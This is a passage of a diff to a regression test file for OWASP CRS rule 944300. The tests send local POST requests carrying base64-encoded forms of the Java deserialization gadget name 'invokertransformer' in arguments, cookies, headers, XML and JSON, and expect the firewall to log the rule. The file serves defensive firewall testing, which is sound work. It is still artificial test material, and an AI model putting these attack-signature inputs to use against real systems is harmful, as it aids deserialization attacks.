User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 